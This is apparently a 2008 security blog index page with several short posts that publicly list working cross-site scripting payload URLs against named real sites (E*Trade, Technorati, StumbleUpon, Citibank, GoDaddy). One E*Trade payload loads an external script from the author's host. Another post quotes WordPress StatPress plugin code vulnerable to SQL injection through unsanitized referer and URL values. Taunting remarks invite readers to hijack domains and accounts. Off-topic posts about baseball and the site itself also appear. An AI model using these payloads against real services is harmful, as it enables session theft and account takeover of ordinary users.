My Security Planet » hiredhacker.com

hiredhacker.com

Fun with E*Trade

Posted: November 4th, 2008, 1:21pm CST by Gerry Eisenhaur

Tags: [edit]

Most of these require the user to be logged in, and for those who don’t know, the ‘expression’ technique only works on IE. You will need to use a different method if you want to test it on other browsers. See Rsnakes cheat sheet for exmaples. https://www.etrade.wallst.com/v1/stocks/snapshot/symbol_lookup.asp?textIn=%22%3E%3Cscript%20src=%22http://www.hiredhacker.com/xss.js%22%3E%3C/script%3E https://us.etrade.com/e/t/accounts/changemyivrpin?FROM_PAGE=changemypasswords%22+style=%22width:expression(alert(/owned/)) https://express.etrade.com/e/t/applogic/OLAMasterpage2?SC=NPNK4KV%22+style=%22width:expression(alert(/owned/)) https://us.etrade.com/e/t/user/login?TYPE=&REALMOID=&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=&TARGET=%22+style=%22width:expression(alert(/owned/)) https://global.etrade.com/e/t/intl/page?nav=3&subnav=4&screen=1%27;alert(/owned/);//&language=en&country=gl (nav and subnav are also vulnerable parameters)
StatPress/StatPress Reloaded - SQL Injections

Posted: November 3rd, 2008, 10:36am CST by Gerry Eisenhaur

Tags: [edit]

iriStatAppend() // URL (requested) $urlRequested = iri_StatPress_URL(); ... $referrer = (isset($_SERVER['HTTP_REFERER']) ? htmlentities($_SERVER['HTTP_REFERER']) : ''); ... $insert = "INSERT INTO " . $table_name . " (date, time, ip, urlrequested, agent, referrer, search,nation,os,browser,searchengine,spider,feed,user,timestamp) " . "VALUES ('$vdate','$vtime','$ipAddress','$urlRequested','" . addslashes(strip_tags($userAgent)) . "','$referrer','" . addslashes(strip_tags($search_phrase)) . "','" . iriDomain($ipAddress) . "','$os','$browser','$searchengine','$spider','$feed','$userdata->user_login','$timestamp')"; $results = $wpdb->query($insert); iri_StatPress_Vars() if (strpos(strtolower($body), "%thistotalvisits%") !== false) { $qry = $wpdb->get_results("SELECT count(DISTINCT(ip)) [...]
Technorati XSS

Posted: November 2nd, 2008, 7:22am CST by Gerry Eisenhaur

Tags: [edit]

If anyone is interested, Technorati is full of bugs like this. http://technorati.com/blogs/tag/%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E http://www.technorati.com/404please%27);alert(1);// http://www.technorati.com/search/%22%3E%3Cscript%3Ealert(1)%3C/script%3E [POST]http://www.technorati.com/account/bio/?bio_blurb=&company=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&zipcode=&country=US&func=updateuser
More StumbleUpon.com Bugs

Posted: November 1st, 2008, 10:04am CDT by Gerry Eisenhaur

Tags: [edit]

Free stumbles anyone? http://www.stumbleupon.com/recover.php?email=no%40no.com%22%3E%3Cscript%3Ealert(1);%3C/script%3E http://www.stumbleupon.com/find_friend.php?q=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
Citibank XSS

Posted: October 31st, 2008, 10:29am CDT by Gerry Eisenhaur

Tags: [edit]

http://www.citibank.com/domain/contact/index.htm?_u=visitor&_uid=&_profile=%2522%2522%253e%253cimg src=%2522%2522 onerror=%2522alert(1)%2522
Godaddy.com XSS

Posted: October 30th, 2008, 5:07pm CDT by Gerry Eisenhaur

Tags: [edit]

Anyone want to take over a few domains? https://dcc.godaddy.com/DccError.aspx?sa=%22+onerror%3d%27alert(1)%27+%22 https://dcc.godaddy.com/default.aspx?activeview=transfer&filtertype=3&sa=%22+onerror%3d%27alert(1)%27+%22 https://mya.godaddy.com/myaError.aspx?sa=%27%20onerror=%27alert(1) It’s scary how full of holes godaddy.com is, this is just a sample of what I saw while I was transferring my domains to webfaction.
New site layout and updates!

Posted: October 30th, 2008, 10:25am CDT by Gerry Eisenhaur

Tags: [edit]

I redesigned, well picked a new theme, and moved the site to a new hosting company today. I have been severily neglecting hiredhacker.com, but life has been filling my time up with ‘real’ things. I will try and post things from time to time, I just really hate writing. I don’t mind giving technical information or [...]
w3af - Web Application Attack and Audit Framework

Posted: May 16th, 2008, 1:36pm CDT by Gerry Eisenhaur

Tags: [edit]

w3af is a Web Application Attack and Audit Framework. The project goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. w3af is a great (and getting better) framework that I just decided to start contributing to. I want to get as much attention to these [...]
Manny being Manny

Posted: May 16th, 2008, 10:18am CDT by Gerry Eisenhaur

Tags: [edit]

A little off topic but if you are a fan of the Sox, or just like baseball you gotta see this. Here is Manny’s sprinting-wall-climbing-high-fiveing-double-play-catch from a few nights ago: http://www.mlb.com/media/video_sl.jsp?video=200805142699480
Oh yea, I have a blog…

Posted: May 16th, 2008, 8:15am CDT by Gerry Eisenhaur

Tags: [edit]

The past few months haven’t exactly been slow for me, hence the lack of new content here. There have been allot of interesting stuff to happen over the past 2 months, I will try to point out the ones I found most interesting. In no particular order (well, except for Mark Dowd’s inhuman paper, that [...]

← 1 Raindrop Matasano Chargen →

My Security Planet » hiredhacker.com

Feeds

hiredhacker.com

Posted: November 4th, 2008, 1:21pm CST by Gerry Eisenhaur

Tags: [edit]

Posted: November 3rd, 2008, 10:36am CST by Gerry Eisenhaur

Tags: [edit]

Posted: November 2nd, 2008, 7:22am CST by Gerry Eisenhaur

Tags: [edit]

Posted: November 1st, 2008, 10:04am CDT by Gerry Eisenhaur

Tags: [edit]

Posted: October 31st, 2008, 10:29am CDT by Gerry Eisenhaur

Tags: [edit]

Posted: October 30th, 2008, 5:07pm CDT by Gerry Eisenhaur

Tags: [edit]

Posted: October 30th, 2008, 10:25am CDT by Gerry Eisenhaur

Tags: [edit]

Posted: May 16th, 2008, 1:36pm CDT by Gerry Eisenhaur

Tags: [edit]

Posted: May 16th, 2008, 10:18am CDT by Gerry Eisenhaur

Tags: [edit]

Posted: May 16th, 2008, 8:15am CDT by Gerry Eisenhaur

Tags: [edit]